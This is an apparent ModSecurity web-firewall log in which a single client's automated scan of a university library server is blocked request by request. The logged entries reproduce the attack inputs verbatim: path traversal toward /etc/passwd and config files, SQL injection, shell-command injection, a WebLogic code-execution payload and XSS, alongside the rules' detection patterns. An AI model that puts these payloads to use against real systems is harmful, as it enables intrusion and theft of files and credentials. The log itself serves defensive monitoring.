[Tue Aug 29 11:46:13.400337 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhzvhsAAAAx"]
[Tue Aug 29 11:46:13.453203 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhtjj0AAAAq"]
[Tue Aug 29 11:46:14.359949 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14FsCo-f0AAAhZRlcAAAAG"]
[Tue Aug 29 11:46:14.481163 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhzviUAAAAx"]
[Tue Aug 29 11:46:15.582023 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhT32sAAAAD"]
[Tue Aug 29 11:46:18.423174 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi2yDAAAAAN"]
[Tue Aug 29 11:46:18.487873 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAdxUswAAAAC"]
[Tue Aug 29 11:46:19.479590 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhBSG0AAAAX"]
[Tue Aug 29 11:46:19.530884 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAi5uFMAAAAS"]
[Tue Aug 29 11:46:20.378665 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAdxUtUAAAAC"]
[Tue Aug 29 11:46:22.429570 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAib53IAAAAA"]
[Tue Aug 29 11:46:27.424056 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi-RBoAAAAH"]
[Tue Aug 29 11:46:28.353394 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAi0JNkAAAAK"]
[Tue Aug 29 11:46:28.388075 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAdxUvIAAAAC"]
[Tue Aug 29 11:46:28.525724 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhrqSUAAAAo"]
[Tue Aug 29 11:46:29.449522 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi-RCgAAAAH"]
[Tue Aug 29 11:46:30.620341 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjCa8MAAAAB"]
[Tue Aug 29 11:46:30.739110 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAjCa8gAAAAB"]
[Tue Aug 29 11:46:31.376651 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAi0JPsAAAAK"]
[Tue Aug 29 11:46:31.423690 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjH@tAAAAAI"]
[Tue Aug 29 11:46:32.433410 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KMCo-f0AAAjCa9gAAAAB"]
[Tue Aug 29 11:46:33.374649 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjKypcAAAAQ"]
[Tue Aug 29 11:46:34.391505 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAhZRqYAAAAG"]
[Tue Aug 29 11:46:35.437985 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhrqS8AAAAo"]
[Tue Aug 29 11:46:39.471521 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAdxUwIAAAAC"]
[Tue Aug 29 11:46:41.431014 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAi2yGUAAAAN"]
[Tue Aug 29 11:46:42.439561 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjKyr0AAAAQ"]
[Tue Aug 29 11:46:43.587154 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhl0FcAAAAi"]
[Tue Aug 29 11:46:47.550709 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhzvn4AAAAx"]
[Tue Aug 29 11:46:49.687312 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAjW9AEAAAAA"]
[Tue Aug 29 11:46:51.364701 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14O8Co-f0AAAh4DfYAAAA2"]
[Tue Aug 29 11:46:57.470607 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14QcCo-f0AAAi-RH0AAAAH"]
[Tue Aug 29 11:47:00.474834 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjKyuUAAAAQ"]
[Tue Aug 29 11:47:01.443707 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjZRYIAAAAS"]
[Tue Aug 29 11:47:02.494795 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAcsLdEAAAAE"]
